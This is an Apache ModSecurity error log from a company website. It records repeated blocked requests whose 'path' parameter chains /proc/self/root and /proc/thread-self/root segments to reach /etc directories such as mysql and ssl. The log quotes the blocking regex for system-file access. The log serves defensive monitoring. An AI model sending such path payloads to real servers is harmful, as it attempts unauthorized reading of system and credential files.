[Wed Mar 18 09:39:31.155170 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:38560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdA8df6f5d65gmYZTJGwAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:35.306505 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.243.128:38576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdBvu8EFLIOrSqIpv5mQAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:37.008660 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:38588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdCcdf6f5d65gmYZTJHwAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:39.467354 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.243.128:38602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdC-w_le52K8_3pV3UIwAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:40.807056 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:35972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdDPu8EFLIOrSqIpv5nAAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:45.811585 2026] [:error] [pid 15051:tid 140411733534464] [client 74.7.243.128:35976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdESmAPhZkrhU8w4lhxAAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:49.825959 2026] [mime_magic:error] [pid 11816:tid 140411641214720] (70014)End of file found: [client 57.141.18.111:41850] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:39:51.985134 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:35986] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdFuoXxyEfFpUF8f9izgAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:39:53.297941 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:55914] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdGda6ubjKNq_cu4aNawAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:40:01.284077 2026] [mime_magic:error] [pid 19507:tid 140411733534464] (70014)End of file found: [client 74.7.243.128:55922] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/log
[Wed Mar 18 09:40:08.299512 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.243.128:47374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdKNY0UrI5A3LftIyZCAAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:40:09.866015 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.241.31:50368] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdKUzinOy1jxa1j4cJQAAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:40:11.128795 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:46182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdK9a6ubjKNq_cu4aNdgAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:40:12.579340 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:46196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdLPu8EFLIOrSqIpv5rQAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:40:13.315161 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.241.31:32978] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdLew_le52K8_3pV3UOQAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:40:24.076159 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.241.31:32992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdN_u8EFLIOrSqIpv5vQAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:40:32.063864 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:42670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdQNa6ubjKNq_cu4aNhwAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:40:34.965774 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.243.128:46206] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdQimAPhZkrhU8w4lh8gAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:40:35.644079 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:41846] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdQ-oXxyEfFpUF8f9i5AAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:40:38.823581 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:48906] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdRew_le52K8_3pV3UVQAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:40:40.162970 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:43488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdSMdf6f5d65gmYZTJWwAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:40:42.555925 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:43502] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdSuoXxyEfFpUF8f9i8AAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:40:49.970114 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:43518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqdUfu8EFLIOrSqIpv50QAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
